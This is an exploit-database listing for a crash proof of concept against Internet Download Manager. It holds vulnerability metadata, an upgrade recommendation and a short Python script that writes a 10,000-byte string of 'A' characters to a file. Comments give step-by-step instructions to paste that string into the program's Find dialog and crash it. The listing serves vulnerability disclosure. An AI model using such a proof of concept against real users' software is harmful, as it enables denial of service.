Internet Download Manager - Crash Proof Of Concept

vendor:

Internet Download Manager

by:

Mohammad Reza Espargham

7.5

CVSS

HIGH

Buffer Overflow

120

CWE

Product Name: Internet Download Manager

Affected Version From: All Versions

Affected Version To: All Versions

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 7 / Server 2008

2020

Internet Download Manager – Crash Proof Of Concept

A buffer overflow vulnerability exists in Internet Download Manager due to improper bounds checking which can be exploited to cause a denial of service or potentially allow remote code execution. An attacker can send a specially crafted file to trigger this vulnerability.

Mitigation:

Upgrade to the latest version of Internet Download Manager.

Source

Exploit-DB raw data:

#!/⁠usr/⁠bin/⁠env python
# Title : Internet Download Manager -⁠ Crash Proof Of Concept
# Affected Versions: All Version
# Founder : InternetDownloadManager
# Tested on Windows 7 /⁠ Server 2008
#
#
# Author      :   Mohammad Reza Espargham
# Linkedin    :   https://ir.linkedin.com/in/rezasp
# E-⁠Mail      :   me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
# Website     :   www.reza.es
# Twitter     :   https://twitter.com/rezesp
# FaceBook    :   https://www.facebook.com/mohammadreza.espargham
#
#
# downlWithIDM64.dll Exploit
#
#
# 1 . run python code : python crash.py
# 2 . open r3z4.txt and copy content to clipboard
# 3 . open "IDM"
# 4 . From Menu , Downloads -⁠-⁠> Find
# 5 . Paste ClipBoard on "File name or part of the name"
# 6 . Click Find
# 7 . Crashed ;)


crash = "\x41"*10000 #B0F
file = open("r3z4.txt", "w")
file.write(crash)
file.close()